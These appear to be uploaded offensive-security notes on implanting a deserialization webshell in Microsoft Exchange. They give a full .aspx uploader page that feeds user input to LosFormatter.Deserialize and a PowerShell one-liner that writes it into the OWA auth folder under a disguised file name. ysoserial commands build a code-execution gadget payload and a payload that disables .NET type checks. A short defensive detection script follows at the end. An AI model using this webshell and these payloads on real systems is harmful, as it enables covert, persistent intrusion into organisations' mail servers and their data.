Execution

This document discusses using PowerShell to upload a webshell payload to a system and serialize it to bypass defenses. It provides commands to base64-encode a webshell, write it to a file on the system, and use ysoserial to generate payloads that can be used in the webshell to execute code or disable .NET protections.

Uploaded by Ehsan Vesali

Execution

PowerShell

uploader.cs (deployed as an .aspx page; the button handler feeds the textbox content straight into LosFormatter.Deserialize)

<%@ Page Language="C#" Debug="true" validateRequest="false" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Runtime.Serialization" %>

<script runat="server">
// LosFormatter lives in System.Web.UI, which ASP.NET pages import by default.
protected void INPUT_Click(object sender, EventArgs e)
{
    LosFormatter Formatter = new LosFormatter();
    // Deserializes whatever the client pasted into the textbox; the gadget
    // chain generated below executes during this call.
    Formatter.Deserialize( INPUT.Text.ToString() );
}
</script>

<html>
<body>
<form id="Form1" runat="server" >
<asp:Panel ID="authentication" runat="server" HorizontalAlign="Center" >
<asp:TextBox runat="server" ID="INPUT" Value="" BackColor="#404040"
    ForeColor="White" style="width: 50%; height: 200px;"/>
<div runat="server" style="width: auto; text-align:center">
<asp:Button ID="Click" runat="server" Text="Execute" OnClick="INPUT_Click" />
</div>
</asp:Panel >
</form>
</body>
</html>

Copy the base64-encoded web shell to the system

www.NooraNet.com

The one-liner decodes the base64 form of uploader.cs and writes it into the OWA auth directory (sc is the Set-Content alias). The encoded blob is the page shown above and is abbreviated here; the original quoted the path as "c:\'Program Files'\...", which would have put literal quote characters into the file name, so the path is given unquoted inside the string:

powershell -command $nss='<base64 of uploader.cs above>';$z = [Convert]::FromBase64String($nss);$z = [System.Text.Encoding]::ASCII.GetString($z);sc -path "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\Httpproxy\owa\auth\nssupdate251.aspx" -value $z

Serialize your web shell

ysoserial.exe -g ActivitySurrogateSelectorFromFile -f LosFormatter -c "nooranet.cs;System.dll;System.Web.dll;System.Data.dll;System.Xml.dll;System.Runtime.Extensions.dll;Microsoft.AspNet.FriendlyUrls.dll;" > nooranet.txt

Paste the content of nooranet.txt into the uploader. If it does not work, first generate a payload that disables the .NET type-check protection:

ysoserial.exe -g ActivitySurrogateDisableTypeCheck -f LosFormatter -c "ignored" > disable.txt
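From the defender's side, the procedure above leaves two checkable artifacts: an .aspx file in the OWA auth folder that is not part of Exchange, and page code that passes a control's text straight into LosFormatter.Deserialize. The following Python triage script is an added example (not part of the original document) that flags both; the baseline of expected auth pages and both sample pages are constructed for illustration.

```python
import re
from typing import Dict, List

# Deserializers that run attacker-chosen gadget chains when fed untrusted bytes.
UNSAFE_FORMATTERS = ("LosFormatter", "ObjectStateFormatter", "BinaryFormatter",
                     "NetDataContractSerializer", "SoapFormatter")
# Page-directive settings the uploader relies on; odd in a production page.
DIRECTIVE_INDICATORS = (r'Debug\s*=\s*"true"', r'validateRequest\s*=\s*"false"')
# Constructed baseline of pages expected in ...\FrontEnd\HttpProxy\owa\auth;
# build the real one from a clean install of the same Exchange build.
KNOWN_AUTH_PAGES = {"logon.aspx", "logoff.aspx", "errorfe.aspx", "signout.aspx"}
# Argument shapes that mean "came from the client" (control text or Request).
REQUEST_SOURCE = re.compile(r"\.Text\b|\.Value\b|\bRequest\b")

def find_deserialize_sinks(source: str) -> List[Dict[str, str]]:
    """One finding per <formatter>.Deserialize(...) whose argument is client data."""
    findings = []
    for fmt in UNSAFE_FORMATTERS:
        # Variables declared as this formatter, plus use of the bare type name.
        names = set(re.findall(rf"\b{fmt}\s+(\w+)\s*=\s*new\s+{fmt}\b", source)) | {fmt}
        for name in names:
            for m in re.finditer(rf"\b{name}\.Deserialize\s*\((.*?)\)\s*;", source, re.S):
                arg = m.group(1).strip()
                if REQUEST_SOURCE.search(arg):
                    findings.append({"formatter": fmt, "argument": arg})
    return findings

def triage_aspx(path: str, source: str) -> Dict[str, object]:
    """Score a page on code sinks, risky directives and unexpected location."""
    norm = path.replace("\\", "/").lower()
    filename = norm.rsplit("/", 1)[-1]
    unexpected = "/frontend/httpproxy/owa/auth/" in norm and filename not in KNOWN_AUTH_PAGES
    sinks = find_deserialize_sinks(source)
    indicators = [p for p in DIRECTIVE_INDICATORS if re.search(p, source)]
    # Heuristic weighting: a sink or a foreign file alone is enough to review.
    score = 2 * len(sinks) + len(indicators) + (2 if unexpected else 0)
    return {"path": path, "sinks": sinks, "indicators": indicators,
            "unexpected_location": unexpected, "suspicious": score >= 2}

# Constructed samples: the uploader's handler from the document and a benign page.
UPLOADER_PAGE = '''<%@ Page Language="C#" Debug="true" validateRequest="false" %>
<script runat="server">
protected void INPUT_Click(object sender, EventArgs e)
{
    LosFormatter Formatter = new LosFormatter();
    Formatter.Deserialize( INPUT.Text.ToString() );
}
</script>'''
BENIGN_PAGE = '<%@ Page Language="C#" %>\n<script runat="server">void Page_Load(object s, EventArgs e) { Label1.Text = "Hi"; }</script>'
```

Run it over every .aspx under the Exchange FrontEnd tree and review anything returned with suspicious set; a clean build gives an empty result for the auth folder.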
